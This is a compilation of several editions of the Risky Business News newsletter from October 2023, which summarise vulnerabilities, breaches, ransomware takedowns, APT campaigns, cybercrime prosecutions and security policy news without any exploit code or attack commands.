SonicWall hardcoded password: Security researchers at watchTowr Labs have found eight vulnerabilities in SonicWall SSL VPNs. All issues have now been fixed.
VMware security updates: VMware has released security updates for its Aria and Fusion products. Horizon3 has a write-up for one of the bugs here.
SolarWinds security updates: SolarWinds has released security updates for its Access Rights Management platform. The patches fix multiple bugs, including three 9.8/10 RCEs [1, 2, 3].
Amazon's passkeys: Identity provider Corbado is not a fan of Amazon's recent passkey implementation.
Three years to fix: The Harvest time-tracking app team took three years to fix a bug in their Azure app that was leaking its customers' OAuth tokens.
Zenbleed PoC: A PoC for the Zenbleed vulnerability that works in the Chrome browser has been released. The bug, disclosed in July, allows an attacker to retrieve secret material from AMD Zen 2 processors. Don't panic, though!
Atlassian zero-day PoC: A PoC for the recent Atlassian Confluence zero-day (CVE-2023-22515) has been added to the Metasploit framework after several exploit developers published PoCs online in the weeksprior. This is the Confluence 10/10 zero-day that was being exploited by a suspected Chinese cyber-espionage group.
HTTP2 Rapid Reset attack: PortSwigger researchers have taken the concept behind the HTTP2 Rapid Reset attack that was being used to launch DDoS attacks and applied it in a manner to perform remote race condition attacks with a single TCP packet. It's actually pretty nifty stuff!
Infosec industry
New tools—GraphRunner: Black Hills Information Security has open-sourced a tool named GraphRunner, a post-exploitation toolset for interacting with the Microsoft Graph API.
"It provides various tools for performing reconnaissance, persistence, and pillaging of data from a Microsoft Entra ID (Azure AD) account."
New tool—FalconHound: Security firm FalconForce has open-sourced FalconHound, a blue team multi-tool.
"It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool."
New tool—Delegate: Bell's Clément Cruchet has open-sourced Delegate, a tool to perform GCP domain-wide delegation abuse and access Workspace users' Drive and Gmail data from a compromised GCP service account.
New tool—WolfPack: RoseSecurity Research has open-sourced WolfPack, a tool that uses Terraform and Packer to streamline the deployment of red team redirectors on a large scale.
Chrome extension mapping: Security researcher Hexacorn has published a list that maps Chrome extension IDs with their real names. It is a useful file to have if you're conducting security research on malicious extensions. The file has more than 386,000 rows.
Hack.lu 2023 videos: Some of the talks from the Hack.lu 2023 security conference, which took place last week, are available on this YouTube channel.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss how changing circumstances change the risk/reward balance and change whether effects operations are worthwhile.
This newsletter is brought to you by application allow-listing software maker Airlock Digital. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Two ransomware gangs have had their dark web server infrastructure disrupted this week in two extremely different circumstances, with hacktivists wiping the servers of the Trigona gang and law enforcement seizing RagnarLocker's infrastructure a day later.
The first to fall was Trigona, a ransomware operation that began operations in June of last year.
In Facebook and Twitter posts, a group of pro-Ukrainian hacktivists named the Ukrainian Cyber Alliance said they hacked the backend servers supporting Trigona's operations.
The apparent intrusion began last week when one of the group's members breached Trigona's Atlassian Confluence server—go figure!
Once inside, the group says it made copies of Trigona's victim data, and then wiped their infrastructure clean. This included ten servers hosting the Trigona dark web leak site, RaaS backend, source code, internal chat rooms, and even Trigona's cryptocurrency wallets.
The Ukrainian Cyber Alliance didn't say how much money the wallets were holding, but they told The Record that they plan to share some of the Trigona data with security researchers.
One day after Trigona's demise, the website for the RagnarLocker gang also went down, with a takedown message listing the logos of the FBI, Europol, and more than a dozen European law enforcement agencies.
Contacted by TechCrunch, Europol confirmed the takedown but said they plan to reveal more details on Friday—a few hours after this newsletter goes live.
While we might not have all the details of this takedown in this edition, the action is extremely significant. The RagnarLocker group was one of the oldest ransomware gangs that were still active. Launched in early 2020, most ransomware groups that launched around that time have long succumbed to in-fighting, rebrands, and law enforcement takedowns.
Even if RagnarLocker was not one of the most active ransomware groups today, it is still good news seeing it bite the dust regardless!
Breaches, hacks, and security incidents
CIA Twitter channel hack: A security researcher has exploited a Twitter bug to hijack a link shared by the CIA on its official account and redirect users seeking to access the CIA's Telegram informant channel with a link to his own.
Hamas hijacks accounts of kidnapped victims: Hamas operators have used the smartphones of kidnapped Israelis to hijack their online accounts and spread propaganda and threats of violence. [Additional coverage in the New York Times/non-paywall]
Real Sociedad cyberattack: Spanish football club Real Sociedad are dealing with a cyberattack that has impacted some of its servers and databases.
certSIGN cyberattack: certSIGN, an official provider of e-signatures for the Romanian government and the private sector, has suffered a ransomware attack. The company restored service after a day.
23andMe leak: The hacker behind the 23andMe data breach has published online the personal information of 4.1 million of the site's users. The data is mostly for UK and German users. Known as Golem, the hacker previously leaked the data of 1 million Ashkenazi Jews. 23andMe confirmed the breach at the start of the month but downplayed its severity. [Additional coverage in TechCrunch]
Casio ClassPad breach: Japanese electronics giant Casio says that hackers breached its ClassPad educational platform and stole the personal data of registered users. The company confirmed the breach after hackers began advertising the ClassPad data on an underground hacking forum in September. Casio says the hacker stole the data of more than 91,000 customers across 149 countries.
CloudChat hack: A threat actor has compromised the website of the CloudChat instant messaging platform and modified the company's Windows installer to deliver malware. It's unclear for how long the backdoored installer was live, but security firm Sophos says it spotted the incident in August and notified the vendor. While it has not received a reply, Sophos says the app's website appears to have now been secured.
BigWhale crypto-heist: The BigWhale DeFi platform has lost $1.5 million worth of crypto-assets after one of its private keys leaked online. The company has promised to refund investors up to "the last cent."
Everscale crypto-heist: The Everscale cryptocurrency project has halted operations after a large number of its tokens were mysteriously stolen. The token's value dropped by 20%. The value of the theft remains unknown. [Additional coverage in Crypto News]
General tech and privacy
Twitter to charge new users: Twitter is moving forward with its plan to charge new users to post on the site. The company is currently running an experiment in New Zealand and the Philippines to see how the new system works and has plans to expand it globally. Twitter says it's taking this step as a way to fight bots. The site has been flooded with bots after Musk's takeover, going from the 300 million MAU it had for half a decade to more than 550 million MAU this year.
Hidden Brave VPN service: The Brave browser was caught installing a hidden VPN service on Windows systems, even if the browser user is not a customer of the company's VPN+firewall offering. [Additional coverage in gHacks]
Microsoft log retention: Starting with October 2023, the log retention period on Microsoft Purview accounts is now 180 days—instead of 90—for both standard and premium customers. Microsoft announced this change back in July after its systems were breached by Chinese hackers, and the lack of proper logs hindered IR investigations.
Google Play Protect update: Google has updated the Play Protect security feature on Android phones to perform real-time scans of suspicious apps.
"Google Play Protect will now recommend a real-time app scan when installing apps that have never been scanned before to help detect emerging threats. Scanning will extract important signals from the app and send them to the Play Protect backend infrastructure for a code-level evaluation. Once the real-time analysis is complete, users will get a result letting them know if the app looks safe to install or if the scan determined the app is potentially harmful."
Government, politics, and policy
Mandatory cyber insurance in Russia: The Russian government is considering introducing a new law that would require mandatory cyber insurance for all public and private companies. Discussions on the law began in June but have been moving slowly. The primary cause is the lack of cyber insurance providers across Russia. [Additional coverage in Kommersant]
Russia builds more internet walls: The Kremlin is working on a law to block access to online games unless they store servers inside Russia. The move comes after several pro-Ukraine and anti-Russian protests were included in some online games, such as Roblox and CounterStrike. [Additional coverage in RBC]
Western companies in Russia: RecordedFuture looks at the dilemma facing Western companies that still have assets in Russia.
"Russia is aware of the corporate dilemma, where Western companies must decide whether to stay in Russia and risk potential targeting or leave and face asset loss but gain Western praise."
Phishing guidance:CISA, the NSA, and the FBI have published a report with guidance on how to stop the latest phishing techniques.
Five Eyes warn of Chinese IP theft: The heads of the Five Eyes intelligence-sharing alliance held their first-ever joint press conference to warn that China is engaging in a concerted campaign to steal cutting‐edge intellectual property from democratic countries. Officials from Australia, Canada, New Zealand, the UK, and the US say the campaign ranges from online hacks to classic human intelligence operations where spies approach targets to spy on their behalf. UK officials say that only in their country alone, spies have approached more than 20,000 people to spy on behalf of China. FBI Director Christopher Wray says China is primarily interested in technologies such as AI, robotics, biotech, and quantum computing.
Image via the FBI, from left to right: Australian Security Intelligence Organisation Director-General Mike Burgess, Canadian Security Intelligence Service Director David Vigneault, FBI Director Christopher Wray, New Zealand Security Intelligence Service Director-General of Security and Chief Executive Andrew Hampton, and MI5 Director General Ken McCallum
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Airlock Digital founders Daniel Schell and David Cottingham about the recent Microsoft Digital Defense Report and the problem of properly securing PowerShell.
Cybercrime and threat intel
E-Root admin arrested: US authorities have indicted a Moldovan national on crimes related to running E-Root, an online marketplace that sold access to hacked computers. Sandu Diaconu was detained in the UK in May 2021 and extradited and arraigned in a US court this week. Diaconu ran E-Root for years until the end of 2020, when the FBI seized the site. Officials say E-Root sold access to more than 350,000 computers across the world, with access being provided via RDP and SSH.
Tech CEO sentenced for IP address theft: US authorities have sentenced the CEO of Micfo LLC to five years in prison for defrauding the American Registry of Internet Numbers (ARIN). Amir Golestan, 40, of Charleston, pleaded guilty to tricking ARIN into granting his company more than 750,000 IPv4 addresses that he later sold on the black market for $3 million in profit. [Additional coverage in KrebsOnSecurity]
US seizes DPRK websites: The US government has seized 17 websites used by North Korean IT workers to disguise their identity and get hired by US companies. The group used the websites to pose as US-based software development companies in order to evade sanctions and pick up outsourcing contracts. The Justice Department says it also seized bank accounts holding $1.5 million in illicit funds generated by the group. Officials say that thousands of North Korean IT workers have been sent to live abroad, and they generate millions in US dollars every year for the regime, money that is used to fund North Korea's weapons program. The FBI has issued updated guidance on how to spot and report DPRK IT workers. [Additional coverage in TheDailyBeast]
Indian government cracks down on tech support scammers: The Indian government raided call centers in 76 locations across the country that engaged in tech support and cryptocurrency scams. Officials detained suspects and seized equipment and bank accounts across 11 Indian states. Named Operation Chakra-II, India's Central Bureau of Investigation received help from Microsoft and Amazon, whose services and customers were often targeted by the scammers.
Notepad++ and KeePass malvertising campaign: Malicious Google Ads promoting malware-infested versions of the Notepad++ editor and the KeePass password manager have been running rampant on the Google search engine for months.
Failed ransomware attack: Sophos looks at a failed ransomware attack with a LockBit knock-off on a company's network, via their Adobe ColdFusion server.
Default password research: Security firm Outpost24 has found that more than 1.8 million leaked admin accounts had been using insecure and easy-to-guess passwords. The most common password was "admin," which researchers found used for more than 40,000 admin accounts. Other common passwords such as "123456," "root," and "Password" also made the Top 20.
Office file formats: Intezer looks at all the different Microsoft Office file formats and how to deal with them during IR engagements.
Web malware evolution: Sucuri researchers explain how threat actors have evolved from using JS and PHP files to store malicious code to using non-executable file formats like LOG and TXT. The technique allows threat actors to avoid having their code spotted by security scanners but also load the content of the LOG or TXT files inside JS and PHP files at runtime without detection.
LATAM threat landscape: As part of its talk at the VirusBulletin conference, ESET researchers have analyzed the threat landscape of Latin America, and the various cybercrime groups active in the region.
Malware technical reports
Qubitstrike: A threat actor named Qubitstrike is targeting internet-connected Jupyter Notebooks hosted in Google and AWS cloud infrastructure. The campaign targets Jupyter Notebooks with weak credentials. Once inside, the group deploys a rootkit, extracts cloud credentials from the compromised host, and moves to other cloud systems in order to mass-deploy a cryptominer. Cado Security researchers believe the threat actor may be based in Tunisia.
Munchkin: Palo Alto Networks has a report on Munchkin, a tool used by the BlackCat (AlphV) ransomware gang to move laterally across breached victim networks and push its file encryptor to as many machines as possible.
Sponsor Demo
Airlock Digital CEO David Cottingham shows Patrick Gray how Airlock's execution control and allowlisting solution works.
APTs and cyber-espionage
More WinRAR abuse: In our Monday (Oct 16) edition, we covered how several APT groups (APT28, Konni, DarkPink) were abusing a recently patched WinRAR zero-day (CVE-2023-38831) as part of their operations. Since then, Google TAG has also published a report highlighting the same thing. Besides APT28 (FROZENLAKE), Google says it also saw Russia's Sandworm (FROZENBARENTS) and Chinese group named APT40 (ISLANDDREAMS) also abusing the vulnerability.
Crambus: Iranian cyber-espionage group Crambus (APT34, OilRig, MuddyWatter) has breached the network of a Middle Eastern government for eight months between February and September 2023. According to Broadcom's Symantec division, the group backdoored and exfiltrated data from 12 computers. They also installed a PowerShell backdoor named PowerExchange on the government's Exchange email server in order to intercept communications in real time.
Hamas-Iran overlap: Recorded Future analysts have found server infrastructure overlaps between apps linked to the Hamas terrorist organization, Palestinian cyber-espionage group TAG-63 (AridViper), and Iran's Quds Force.
DPRK's TeamCity exploitation: Two North Korean hacking groups named Diamond Sleet and Onyx Sleet are exploiting a vulnerability in JetBrains TeamCity CI/CD servers to gain access and deploy backdoors and remote access trojans across enterprise networks. Tracked as CVE-2023-42793, the vulnerability was patched in late September, and attacks began at the start of October after proof-of-concept code was published online. Several ransomware groups have been spotted leveraging the vulnerability for initial access. Roughly 1,200 TeamCity servers are currently reachable online.
DPRK uses AI for malware: Deputy National Security Advisor Anne Neuberger says that North Korea is experimenting with using AI to write malicious code and find new systems to exploit. Other nation-state actors are also using AI, but Neuberger did not provide any other details. The exact quote is below. [Additional coverage in VentureBeat]
"So we have observed some North Korean and other nation-state and criminal actors try to use AI models to help accelerate writing malicious software and finding systems to exploit."
MATA campaign: Cyber-spies have targeted oil companies and defense contractors across Eastern Europe in what looks to be a suspected North Korean operation. The attacks took place between August 2022 and May 2023 and used an updated version of the powerful MATA malware framework. Discovered by Kaspersky, the company says the framework included both Windows and Linux malware, stealers, EDR bypassing tools, and even a USB worm to collect data from air-gapped networks. Kaspersky researchers have not formally attributed the attacks but noted the MATA code contains similarities to malware previously used by North Korean and Five Eyes APT groups. An analysis of malware compilation times seems to point the finger at a group based in Korean, Chinese, and Vietnamese time zones. While Kaspersky did not name the group, it appears this is what PT Security has previously named Dark River.
Vulnerabilities, security research, and bug bounty
Secret Citrix zero-day: Google's Mandiant division says that a recently patched Citrix vulnerability has been exploited in the wild since the end of August. Tracked as CVE-2023-4966, the vulnerability impacts ADC and NetScaler devices and was patched on October 10. Mandiant says the zero-day can allow attacks to hijack existing user sessions and bypass authentication requirements. The company is now warning owners of Citrix ADC and NetScaler devices to install the recent patch and invalidate all existing user sessions to prevent threat actors from abusing old sessions.
More info on the Adobe Reader zero-day: North Korean hackers have exploited an Adobe Reader zero-day (CVE-2023-26369) in a social engineering campaign that targeted security researchers this year. The Adobe Reader zero-day is the unnamed zero-day that Google mentioned in a blog post in September. North Korean hackers have been targeting security researchers for the past two years in an attempt to steal exploits and research on unpublished vulnerabilities. The recent campaign stood out because, besides GitHub and Twitter, North Korea also contacted security researchers active on the Mastodon network. Besides the recent Adobe Reader zero-day, in the past, North Korean hackers also used an Internet Explorer zero-day to compromise the PCs of security researchers.
Synology NAS bugs: Claroty researchers have discovered that Synology NAS devices are using a weak RNG algorithm that can allow threat actors to reconstruct the admin account password and take over the device. Tracked as CVE-2023-2729, the issue was fixed in June.
Caliptra security audit: NCC Group has conducted a security audit of Caliptra, a firmware solution for implementing Root of Trust on datacenter-class SoCs. The security audit was contracted by Microsoft and found 26 vulnerabilities, all fixed now.
Cisco IOS XE carnage: The number of backdoored Cisco routers and switches via the recent IOS XE zero-day (CVE-2023-20198) has now almost reached 42,000. More in this GreyNoise analysis.
Infosec industry
New tool—Security Insights Specification: The Open Source Security Foundation (OpenSSF) has released the final version of the Security Insights Specification, a specification that provides a mechanism for projects to report information about their security in a machine-processable way.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss how changing circumstances change the risk/reward balance and change whether effects operations are worthwhile.
This newsletter is brought to you by application allow-listing software maker Airlock Digital. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A mysterious APT group has compromised secure USB drives used by an Asian country's government to safely store and physically transfer data between sensitive government systems.
Spotted by Kaspersky, the attacks took place in early 2023. While the security firm has not attributed the operation to any particular APT group or state, the campaign is extremely likely to be Chinese in origin. Chinese APT groups—such as Camaro Dragon, Temp.Hex, UNC4191, Mustang Panda, and Troppic Trooper—have used USB drives as a way to distribute malware across the APAC region for the past several years, and some of these campaigns have been recently seen in Africa and Europe as well.
But while previous campaigns targeted your run-of-the-mill USB thumb drives, Kaspersky says this campaign targeted "a specific type of a secure USB drive" used by that country's government agencies.
Secure USB drives are also known as encrypted USBs and are typically used to store sensitive information in a separate partition. Everything on this partition is encrypted. The USB uses software stored in an unencrypted part of the USB device along with a user password to access the encrypted data.
Such devices are typically used by companies and government agencies to store extremely sensitive data and then physically transfer the USB drive to a secure location and plug it into an air-gapped network.
Kaspersky says the APT group crafted malware that would hide in the secure USB's software, working as a worm and loading itself on all computers the secure USB would be plugged into. A more technical explanation is below:
"The attack comprises sophisticated tools and techniques, including virtualization-based software obfuscation for malware components, low-level communication with the USB drive using direct SCSI commands, self-replication through connected secure USB drives to propagate to other air-gapped systems and injection of code into a legitimate access management program on the USB drive which acts as a loader for the malware on a new machine."
Attacks so far have been "extremely targeted," and Kaspersky says the APT made only a "limited number of victims." Which is extremely good for an intelligence collection operation targeting air-gapped systems. Not good is the part about getting caught.
Updated on October 19 to add that Kaspersky has named this APT as TetrisPhantom and plans to provide more details about the group at its upcoming SAS security conference.
Breaches, hacks, and security incidents
BlackHole crypto-heist: Hackers have stolen $1.2 million worth of funds from the BlackHole cryptocurrency project after they exploited a vulnerability in the token's smart contract.
Guatemala hacktivism: Hackers associating with the Anonymous collective have launched DDOS attacks against Guatemalan government websites. The hackers said their attacks are in support of the country's pro-democracy protests. Public rallies have been taking place in Guatemala since August when the country's president challenged the results of recent elections and has delayed the new president from taking office. [Additional coverage in the Associated Press]
Belgian govt DDOS attacks: Belgium's cybersecurity agency says several government websites were taken offline last Thursday following a series of DDOS attacks. Affected websites included the website of the Royal Palace, the Chancellery of the Prime Minister, and the Senate.
Colonial Pipeline denies second ransomware incident: US oil pipeline operator Colonial Pipeline has denied rumors that it got hit by ransomware for a second time. The company denied a claim made by the operators of the Ransomed.vc gang. This comes as no surprise, as the gang has made several unfounded claims about intrusions at several big-name companies over the past two weeks. [Additional coverage in The Record]
Ampersand ransomware attack: TV advertising company Ampersand has confirmed it dealt with a ransomware attack after the Black Basta crew claimed it breached the company earlier this year. [Additional coverage in The Record]
Kansas courts cyber incident: Court systems across Kansas have switched to using pen and paper in the aftermath of a cyberattack that took down some of its IT systems. Residents who have to pay court fees or file paperwork have been asked to visit courthouses in person or deliver documents via fax or mail. Kansas officials say that recovering from the attack will take at least two weeks, if not more. The incident is suspected to be another ransomware attack, with a similar incident hitting some Florida courts last week. [Additional coverage in the Wichita Eagle]
D-Link data breach: Taiwanese networking equipment maker D-Link has confirmed a security breach after some customer data was posted for sale on an underground hacking forum earlier this month. The company says the breach occurred after an employee fell victim to a phishing attack. D-Link says the attacker accessed an old 2015 management system where it extracted customer names and emails. The hacker claimed to have stolen "three million lines of customer information," but D-Link says that only 700 customers were impacted.
General tech and privacy
Tech layoffs: LinkedIn and StackOverflow have laid off employees this week. 700 at LinkedIn and 28% at StackOverflow.
WhatsApp adds passkeys: Meta's WhatsApp messaging platform has announced support for passkeys, following in the footsteps of Google, Apple, Amazon, and many other tech companies.
Non-consensual deepfake porn: There are now almost 250,000 videos of non-consensual deepfake porn. [Additional coverage in Wired/non-paywall]
Government, politics, and policy
New NCF commander: Air Vice-Marshal Tim Neal-Hopes has been appointed as Commander of the UK's National Cyber Force (NCF). Neal-Hopes becomes the agency's second commander. He succeeds James Babbage, who left the NCF for the UK's National Crime Agency earlier this year.
Secure by design guidance: CISA has updated its "Secure by Design" guidance that the agency first released back in April. The guidance has been updated with advice from seven new international partners, on top of the ten organizations who crafted the original document.
"[T]his joint guidance urges software manufacturers to take urgent steps necessary to ship products that are secure by design and revamp their design and development programs to permit only secure by design products to be shipped to customers."
Foreign intelligence guidance: The US National Counterintelligence and Security Center has published a guide to mitigating foreign intelligence threats to private organizations. The guide promotes basic concepts such as identifying critical assets, risk and vulnerability assessments, and mitigation planning. The guide [PDF] covers basic scenarios of dealing with possible foreign intelligence entities, such as insider threats, visitor vetting, foreign travel reporting, and more.
China's IPv6 legislation: China's government has passed new legislation mandating that all new wireless-capable devices support the newer IPv6 standard. The act also requires that telecom operators to support the protocol.
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Airlock Digital founders Daniel Schell and David Cottingham about the recent Microsoft Digital Defense Report and the problem of properly securing PowerShell.
Cybercrime and threat intel
Navy IT manager sentenced: A judge has sentenced a former US Navy IT manager to five years and five months in prison for unlawfully gaining access to a computer database and selling the personal data of thousands of users on the dark web. Marquis Hooper used his Navy credentials to trick a company into gaining access to its database to perform background checks. US officials say Hooper used the access to collect data on 9,000 individuals that he sold on the dark web and earned $160,000. The stolen information was used to perform fraud, such as crafting fake IDs to withdraw money from bank accounts. Hooper also granted access to the account to his wife, who is scheduled for sentencing in November.
IDF data for sale: A threat actor claims to be in possession and is selling the personal data of Israeli military and intelligence agents on a Russian-speaking underground hacking forum. The data allegedly contains information on Israel Defense Forces and Israel Security Agency members. According to threat intel firm ZeroFox, the data is being sold for $15,000.
"The threat actor advertising the compromised data for sale instead of sharing it for free indicates that their incentive is unlikely ideological. The initial date of compromise for the advertised data is unclear; however, it is likely perceived as more valuable after the outbreak of hostilities between Israel and Hamas. This is further demonstrated in the price, which is above average for the amount of data advertised."
Discord abuse: Trellix examines how threat actors are abusing Discord for their operations, such as using it for C&C data collection, storing malware payloads, or social engineering.
Discord campaign: And speaking of Discord abuse, Trend Micro published a report on a threat using Discord to host and distribute the Lumma infostealer. Just like the Trellix report, Discord was used here for spamming targets via DMs, as a malware CDN, and as C&C.
CobaltStrike hunting: Cyphur Labs have published instructions on how security researchers can hunt for Cobalt Strike 4.9 C&C servers. v4.9 of Cobalt Strike got leaked on a Chinese hacking forum earlier this month, and its usage among threat actors is expected to rise in the coming weeks. So far, Cyphur analysts have identified at least two Cobalt Strike v4.9 servers.
Fake browser updates: Security firm Proofpoint has seen an increase in activity from threat actors that use fake browser updates to deliver malware. The most active groups include SocGolish, FakeSG (RogueRaticate), ZPHP (SmartApeSG), and ClearFake. Proofpoint says these threat actors plant web pages on hacked websites that promote an update for the user's browser. When users download and run the update, they also install malware on their systems. The technique has been used for more than a decade but is seeing a recent resurgence, being primarily used to distribute infostealers and sometimes ransomware.
Malware technical reports
Lumma Stealer: Intrinsec has a report on the Lumma Stealer.
XorDDoS: Palo Alto Networks takes a look at the recent campaigns delivering the XorDDoS malware to Linux systems.
"The XorDDoS Trojan spread around the world during July and August 2023. This threat infects Linux devices and transforms them into zombies for launching DDoS attacks. The attackers coordinate the botnet with C2 domains that they have abused before. However, they have recently relocated their C2 servers to new IP addresses from public hosting services."
BADBOX: Chinese security firm QiAnXin has independently confirmed a Human report on the PEACHPIT ad fraud botnet and the BADBOX threat actor. I was hoping for more info on this threat actor from beyond the GFW, but nothing of the sort for now.
ClearFake: Sekoia researchers have published a technical analysis of ClearFake, a new malicious JavaScript framework deployed on hacked websites to deliver malware using drive-by downloads. This is the same JS framework that stores part of its malicious code inside smart contracts on the Binance blockchain, covered by Guardio and FINSIN over the past weeks. The new framework was first spotted in August and is currently installed on a few hundred sites.
"ClearFake is another 'fake updates' threat leveraging social engineering to trick the user into running a fake web browser update, as for SocGholish and FakeSG malware. By linking the 'fake updates' lure to the watering hole technique, ClearFake operators target a wide range of users and conduct effective, scalable malware distribution campaigns."
Sponsor Demo
Airlock Digital CEO David Cottingham shows Patrick Gray how Airlock's execution control and allowlisting solution works.
APTs and cyber-espionage
Confucius: Chinese security firm Anheng Hunting Labs has published a report on recent Confucius APT operations distributing the River Stealer.
Kimsuky: AhnLab looks at how the Kimsuky APT is using RDP across different campaigns as a way to access and control compromised environments and exfiltrate data.
BadRory: Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged boobytrapped Office emails. Targets included government entities, military contractors, universities, and hospitals. Kaspersky classified the threat actor as "Russian-speaking."
HideBear: QiAnXin has published a report on Operation HideBear, a campaign from the RomCom group spreading a version of the MINEBRIDGE backdoor via spear-phishing emails.
UAC-0165 (Sandworm) telecom attacks: Russian cyber-espionage group Sandworm (UAC-0165) has breached the networks of 11 Ukrainian telecommunications providers. The intrusions took place between May and September this year. According to Ukraine's CERT team, Sandworm operators deployed backdoors (Poseidon, PoemGate) to harvest data and scripts that disrupted equipment, causing outages for telco customers. The Sandworm group has carried out multiple destructive attacks against Ukrainian networks since Russia's invasion of Ukraine, with the latest taking place in May when it hit a government organization.
Vulnerabilities, security research, and bug bounty
CISA, FBI warn of Atlassian widespread exploitation: CISA and the FBI have asked organizations to patch a recently disclosed Atlassian Confluence zero-day (CVE-2023-22515). The zero-day was used by a suspected Chinese APT (Storm-0062) in limited attacks since mid-September. The agencies say they expect the vulnerability to see widespread abuse due to its ease of exploitation and the availability of proof-of-concept code.
Cisco zero-day: A threat actor is exploiting a zero-day vulnerability in the Cisco IOS XE operating system. Tracked as CVE-2023-20198, the zero-day impacts the web UI, and allows a remote, unauthenticated attacker to create an account that has full access to the device. Cisco says its customer support teams discovered the attacks in late September while investigating customer complaints. The company says it's working on a patch and has asked customers to disable the HTTP Server feature on their IOS XE routers and switches. Security firm VulnCheck says it found thousands of Cisco systems that have been compromised and has released a free scanner to detect malicious implants. LeakIX has the number at more than 30,000. The zero-day has a severity rating of 10/10, and this is the second IOS XE zero-day that Cisco discovered over the past month (after CVE-2023-20109).
More Exim patches: The developers of the Exim email server have released a security update to patch three zero-days disclosed by the ZDI project. Exim developers released a patch for the first and most severe three zero-days at the start of the month. This latest update has now fixed all the six vulnerabilities initially disclosed by ZDI researchers. The Exim team has also deprecated all previous Exim server versions, and only the current 4.96.2 version is now formally supported.
Liferay vulnerabilities: The Liferay Portal CMS has released security updates to patch three persistent XSS vulnerabilities, including one with a severity score of 9.1/10 that can allow threat actors to hijack the entire website. Swiss security firm Pentagrid has a write-up of the bugs here.
CasaOS vulnerabilities: SonarSource researchers have found two vulnerabilities in CasaOS, an open-source OS used by some NAS makers. The two vulnerabilities allow attackers to bypass authentication and gain full access to the CasaOS dashboard. Patches for both bugs were released back in July.
Chrome RCE: GitHub's security team has an analysis of CVE-2023-4069, a type confusion to RCE vulnerability that was patched in the Chrome browser in July this year.
"Vulnerabilities like this are often the starting point for a "one-click" exploit, which compromises the victim's device when they visit a malicious website. What's more, renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process."
More MFT vulnerabilities: Security firm Rapid7 has found six vulnerabilities in Titan MFT and Titan SFTP, two file-transfer solutions from South River Technologies. Although hard to exploit, the vulnerabilities can allow for full device takeover and have been patched by the vendor. These mark the third and fourth file-transfer solutions where Rapid7 found bugs after finding similar issues in the JSCAPE MFT and Fortra's Globalscape EFT Server. The company says it started looking into the security of file transfer appliances after several products had been widely exploited over the past two years.
Infosec industry
New tool—open-source-web-scanners: Security researcher Simon Bennetts is maintaining a list of open-source web security scanners.
New tool—CloudRecon: Gunnar Andrews and Jason Haddix have open-sourced CloudRecon, a collection of red-team tools for cloud reconnaissance. The tool was presented at this year's DEFCON conference.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss how changing circumstances change the risk/reward balance and change whether effects operations are worthwhile.
This newsletter is brought to you by application allow-listing software maker Airlock Digital. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
In the face of an escalating military conflict with Hamas and Hezbollah forces, the Israeli government has asked citizens to secure home security cameras or shut them down completely, fearing the devices could be hacked and used for espionage and intelligence collection.
In a memo on Friday, Israel's National Cyber Directorate has asked camera owners to change their passwords, enable two-factor authentication if present, and enable automatic security updates.
If camera owners can't change any of their settings, officials have urged owners to either cover camera lenses or shut down devices completely.
Israeli officials aren't taking any chances and have most likely learned a vital lesson from the recent Russo-Ukrainian conflict, where security cameras across Ukraine have been hacked by Russian hackers to track military aid convoys and adjust missile targeting in real-time.
With Israel moving a large part of its military forces across the country, not exposing troop and gear location via someone's home camera feed is a must for the safe movement of its troops.
In addition, there is also a propaganda aspect to take into consideration. Since the initial Hamas attack on October 7, footage taken from hacked security cameras showing Hamas rockets hitting Israeli homes has also been widely shared online.
Securing all those cameras will also be a daunting task, even in a time of heightened attention from the general public to any security recommendations.
According to the government's own data, there were more than 66,000 security cameras across Israel that were vulnerable to some sort of remote attacks.
According to a Calcalist report, hacks of security are already underway, although it's unclear if this is just aimless hacktivism or actual intelligence collection.
One lesson is clear in all of this, though. In the aftermath of both the Russo-Ukrainian and Israeli-Palestinian conflict, security cameras have turned out to be the wild cards in modern-day intelligence collection. Sure, there were cameras in Iraq and Afghanistan in the early 2000s, but they are not as widely installed as they are now, where you can watch over entire towns just by hacking into a few routers that still use their default passwords.
Breaches, hacks, and security incidents
Another Aadhaar leak: One of the Indian local government websites leaked Aadhaar data again. This time it got patched when the issue was reported, unlike in the past, when journalists needed to shame the government into taking action. [Additional coverage in TechCrunch]
UK fines Equifax: The UK's financial regulator fined Equifax £11 million ($13.4 million) for the company's 2017 data breach. The FCA says Equifax UK outsourced the data of UK citizens to its US parent company, which then failed to properly secure it and took six weeks to discover it got hacked. The company's 2017 breach exposed the personal data of 163 million users, including 13.8 million UK consumers.
23andMe gets sued:At least five class-action lawsuits have been filed against DNA and genetic testing service 23andMe in the aftermath of its recent security breach. [Additional coverage in Insurance Journal]
CDW ransomware attack: The LockBit ransomware gang is demanding a whopping $80 million ransom from CDW, one of the world's largest IT service providers. CDW says news of the hack is overblown, and the attack didn't impact any of its operations. The company says the hackers only gained access to the internal network of Sirius Federal, a small subsidiary of one of its subsidiaries. The LockBit gang plans to release CDW's stolen data later this week. [Additional coverage in The Record]
Vercel rogue employee: WebDev platform Vercel has "taken appropriate actions" against an employee who used access to its platform to harass a customer with legal threats about a customer domain that was too similar to a domain owned by the employee. Nothing surprising here since Vercel has been caught releasing "open source" alternatives of other people's commercial apps as part of a marketing stunt.
FSL rug pulls after one day: The developers of the FSL cryptocurrency token have exit-scammed and ran away with customer funds just one day after launching the project. According to blockchain security firm Beosin, the FSL team took 97% of the tokens they created and sent them to TornadoCash, a known money laundering service. The size of the stolen assets is believed to be $1.68 million, and the value of FSL tokens immediately crashed after news of the developers' rug pull. [Additional coverage in PanewsLab/English coverage]
